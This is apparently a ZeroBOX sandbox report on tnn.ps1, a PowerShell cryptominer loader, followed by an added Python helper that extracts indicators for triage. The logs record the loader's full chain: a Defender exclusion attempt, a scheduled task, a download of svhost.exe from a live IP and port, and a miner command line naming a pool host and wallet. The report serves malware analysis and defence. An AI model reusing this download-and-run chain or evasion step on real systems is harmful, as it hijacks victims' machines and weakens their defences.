Summary | ZeroBOX

tnn.ps1

Tags: Generic Malware, Antivirus, UPX, PE64, PE File, OS Processor Check
Category: FILE
Machine: s1_win7_x6403_us
Started: Jan. 10, 2025, 11:58 a.m.
Completed: Jan. 10, 2025, 12:02 p.m.
Size 15.3KB
Type ASCII text
MD5 09f0fba23eae6e1f13662796cca68e88
SHA256 9a96719aa017ae54fb3b787344b26e383be1d7412cfcc0c0c1ee9b59d2949364
CRC32 CAE0BED8
ssdeep 192:+xtIF8/3VtJF+qFoYu1F6pCK4yi9Rk2Tubv5kXspVN0gKIywMcsl3xtIv8/3VjbU:+xtLJF+qSp1VhKBMxt++I1wrm6h+
Yara
  • Antivirus - Contains references to security software

DNS lookups (Name / Response / Post-Analysis Lookup)
spr.tw-pool.com  35.206.217.175

Contacted hosts (IP Address / Status / Action)
151.106.34.115  Active  Moloch
154.59.110.182  Active  Moloch
164.124.101.2   Active  Moloch
35.206.217.175  Active  Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Running with administrative privileges.
console_handle: 0x0000001f
1 1 0

WriteConsoleW

buffer: Adding exclusion for 'C:\Users\test22\AppData\Local\Temp\svhost.exe'...
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: Failed to add exclusion. Error: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: Failed to add exclusion.
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: Starting S-T execution.
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: Error: Failed to create scheduled task. The term 'Get-ScheduledTask' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
console_handle: 0x00000063
1 1 0

WriteConsoleW

buffer: Scheduled task creation failed.
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: Scheduled task 'DownloadAndRunProgramTask' does not exist or is disabled.
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: Scheduled task verification failed.
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: S-T execution completed.
console_handle: 0x00000097
1 1 0

WriteConsoleW

buffer: Checking for processes using excessive CPU...
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: Get-Counter : The data in one of the performance counter samples is not valid.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: View the Status property for each PerformanceCounterSample object to make sure
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: it contains valid data.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\tnn.ps1:58 char:32
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $cpuUsage = Get-Counter <<<< '\Process(*)\% Processor Time' | Select
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: -Object -ExpandProperty CounterSamples
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidResult: (:) [Get-Counter], Exception
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CounterApiError,Microsoft.PowerShell.Commands.Ge
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: tCounterCommand
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: Failed to terminate process pw (PID: ). Error: Cannot bind parameter 'Id'. Cannot convert value "pw" to type "System.Int32". Error: "Input string was not in a correct format."
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: Verifying if program 'svhost.exe' is running...
console_handle: 0x0000002b
1 1 0

WriteConsoleW

buffer: Error occurred while checking for program: Cannot find a process with the name "svhost". Verify the process name and call the cmdlet again.
console_handle: 0x00000037
1 1 0

WriteConsoleW

buffer: Program is not running. Repeating the process...
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: Downloading program from http://151.106.34.115:6573/svhost.exe...
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: Failed to download using Invoke-WebRequest. Falling back to .NET WebClient.
console_handle: 0x00000067
1 1 0

WriteConsoleW

buffer: Executing program: svhost.exe
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: Program 'svhost.exe' executed successfully.
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: Sleeping before the next check...
console_handle: 0x00000093
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b1270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003b12b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025df000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05430000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06060000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05431000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05432000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05433000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05434000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05435000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05450000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05436000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05256000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05437000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05241000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061be000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061bf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x061c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05438000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05439000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02842000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02843000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05451000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0543a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0543b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0543c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 840
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0543d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\svhost.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\svhost.exe
parameters: -d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL
filepath: C:\Users\test22\AppData\Local\Temp\svhost.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received: binary response body to GET /svhost.exe (the downloaded svhost.exe payload); the raw bytes are not representable as text and are omitted here.
Data sent GET /svhost.exe HTTP/1.1 Host: 151.106.34.115:6573 Connection: Keep-Alive
host 151.106.34.115
host 154.59.110.182
file C:\Users\test22\AppData\Local\Temp\svhost.exe
Antivirus detections (engine / verdict)
CTX powershell.trojan.generic
VIPRE Heur.BZC.PZQ.Boxter.928.D6331F74
Arcabit Heur.BZC.PZQ.Boxter.928.D6331F74
BitDefender Heur.BZC.PZQ.Boxter.928.D6331F74
MicroWorld-eScan Heur.BZC.PZQ.Boxter.928.D6331F74
Emsisoft Heur.BZC.PZQ.Boxter.928.D6331F74 (B)
Ikarus Trojan.PowerShell.Crypt
FireEye Heur.BZC.PZQ.Boxter.928.D6331F74
Google Detected
Kingsoft Script.Ks.Malware.1747
Microsoft Trojan:Win32/Vigorf.A
GData Heur.BZC.PZQ.Boxter.928.D6331F74
huorong TrojanDownloader/PS.NetLoader.hc
Time & API Arguments Status Return Repeated

send

buffer: GET /svhost.exe HTTP/1.1 Host: 151.106.34.115:6573 Connection: Keep-Alive
socket: 1800
sent: 79
1 79 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\svhost.exe" -d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\svhost.exe -d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL
file C:\Windows\System32\lsm.exe
file C:\Users\test22\AppData\Local\Temp\svhost.exe
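The WriteConsoleW records above and the martian_process command line together describe the loader: running elevated, it tried to add a Defender exclusion for the dropped binary, tried to register a scheduled task named DownloadAndRunProgramTask, downloaded svhost.exe from http://151.106.34.115:6573/svhost.exe (falling back from Invoke-WebRequest to .NET WebClient), and launched it against spr.tw-pool.com:14001. Both the exclusion and the task failed only because the sandbox is Windows 7 (s1_win7_x6403_us), where Add-MpPreference and Get-ScheduledTask do not exist; on a current Windows host those cmdlets ship with the Defender and ScheduledTasks modules, so both steps would be expected to succeed. The following triage helper is an added example for this page, not code from ZeroBOX or from tnn.ps1: it parses a transcription of those console lines and the command line into indicators. Assumptions not stated by the report: that `-d` is the pool host:port and `-w` the wallet.worker argument (inferred from the values), that the `spectre:` address prefix and the `spr.` pool host point to a Spectre (SPR) miner, the ATT&CK technique mapping, and the short list of system binary names used for the look-alike check.

```python
"""Triage helper for the behaviour recorded in this report: pull IOCs out of the
loader's console messages and out of the miner command line it launched.
Added example for this page; not code from ZeroBOX or from tnn.ps1."""
import difflib
import re

# Constructed sample: console lines transcribed from the WriteConsoleW records above.
CONSOLE_LINES = [
    "Running with administrative privileges.",
    "Adding exclusion for 'C:\\Users\\test22\\AppData\\Local\\Temp\\svhost.exe'...",
    "Failed to add exclusion. Error: The term 'Add-MpPreference' is not recognized",
    "Error: Failed to create scheduled task. The term 'Get-ScheduledTask' is not recognized",
    "Scheduled task 'DownloadAndRunProgramTask' does not exist or is disabled.",
    "Downloading program from http://151.106.34.115:6573/svhost.exe...",
    "Failed to download using Invoke-WebRequest. Falling back to .NET WebClient.",
    "Executing program: svhost.exe",
]
# The martian_process command line from the report (quoted form).
MARTIAN_CMDLINE = (
    '"C:\\Users\\test22\\AppData\\Local\\Temp\\svhost.exe" -d spr.tw-pool.com:14001'
    " -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL"
)
# Editor's short list of Windows binaries that droppers imitate by name (assumption).
SYSTEM_NAMES = ("svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe")


def extract_console_indicators(lines) -> dict:
    """Turn the loader's own status messages into behavioural indicators.
    An exclusion counts as added only if no 'Failed to add exclusion' line
    follows the 'Adding exclusion' line (here Add-MpPreference was missing)."""
    ind = {"ran_as_admin": False, "exclusion_paths": [], "exclusion_added": False,
           "scheduled_tasks": [], "download_urls": [], "executed": []}
    for line in lines:
        if line.startswith("Running with administrative privileges"):
            ind["ran_as_admin"] = True
        elif m := re.match(r"Adding exclusion for '([^']+)'", line):
            ind["exclusion_paths"].append(m.group(1))
            ind["exclusion_added"] = True
        elif line.startswith("Failed to add exclusion"):
            ind["exclusion_added"] = False
        elif m := re.search(r"Scheduled task '([^']+)'", line):
            ind["scheduled_tasks"].append(m.group(1))
        elif m := re.search(r"Downloading program from (\S+)", line):
            ind["download_urls"].append(m.group(1).rstrip("."))  # strip trailing '...'
        elif m := re.search(r"Executing program: (\S+)", line):
            ind["executed"].append(m.group(1))
    return ind


def parse_miner_cmdline(cmdline: str) -> dict:
    """Split the launched command line into image, pool and wallet fields.
    Assumption (inferred from the values, not stated by the report): -d is the
    pool host:port and -w is <address>.<worker>, the usual miner convention."""
    out = {"image": None, "pool_host": None, "pool_port": None,
           "address_prefix": None, "address": None, "worker": None}
    if m := re.match(r'\s*"?(.+?\.exe)"?\s', cmdline):
        out["image"] = m.group(1)
    if m := re.search(r"-d\s+(\S+)", cmdline):
        host, sep, port = m.group(1).rpartition(":")
        out["pool_host"] = host if sep else port
        out["pool_port"] = int(port) if sep and port.isdigit() else None
    if m := re.search(r"-w\s+(\S+)", cmdline):
        addr, _, worker = m.group(1).partition(".")
        prefix, sep, body = addr.partition(":")
        out["address_prefix"] = prefix if sep else None
        out["address"] = body if sep else addr
        out["worker"] = worker or None
    return out


def lookalike_of(path: str, names=SYSTEM_NAMES, threshold: float = 0.9):
    """Return the system binary a file name imitates (svhost.exe vs svchost.exe),
    or None when the name is exact or not close enough to any entry."""
    base = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    best = max(names, key=lambda n: difflib.SequenceMatcher(None, base, n).ratio())
    close = difflib.SequenceMatcher(None, base, best).ratio() >= threshold
    return best if close and base != best else None


def triage(console_lines, cmdline: str) -> dict:
    """Combine both parsers into an IOC list plus an ATT&CK mapping (editor's own)."""
    ind = extract_console_indicators(console_lines)
    miner = parse_miner_cmdline(cmdline)
    iocs = set(ind["download_urls"])
    if miner["pool_host"]:
        iocs.add(f"{miner['pool_host']}:{miner['pool_port']}")
    if miner["address"]:
        iocs.add(miner["address"])
    checks = [
        (ind["exclusion_paths"], "T1562.001"),   # Impair Defenses: Disable or Modify Tools
        (ind["scheduled_tasks"], "T1053.005"),   # Scheduled Task/Job: Scheduled Task
        (ind["download_urls"], "T1105"),         # Ingress Tool Transfer
        (miner["pool_host"], "T1496"),           # Resource Hijacking
        (miner["image"] and lookalike_of(miner["image"]), "T1036.005"),  # Masquerading
    ]
    return {"indicators": ind, "miner": miner, "iocs": sorted(iocs),
            "attack": [tid for hit, tid in checks if hit]}


if __name__ == "__main__":
    print(triage(CONSOLE_LINES, MARTIAN_CMDLINE))
```

Run stand-alone it prints the indicator dictionary for the sample; point `triage` at the console output and process command line of another report to get the same shape. The exclusion bookkeeping matters for response: `exclusion_added` is False here only because the cmdlet was absent on the sandbox OS, so a host that ran this loader on Windows 10 or 11 should be checked with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and `Get-ScheduledTask -TaskName DownloadAndRunProgramTask` rather than assumed clean.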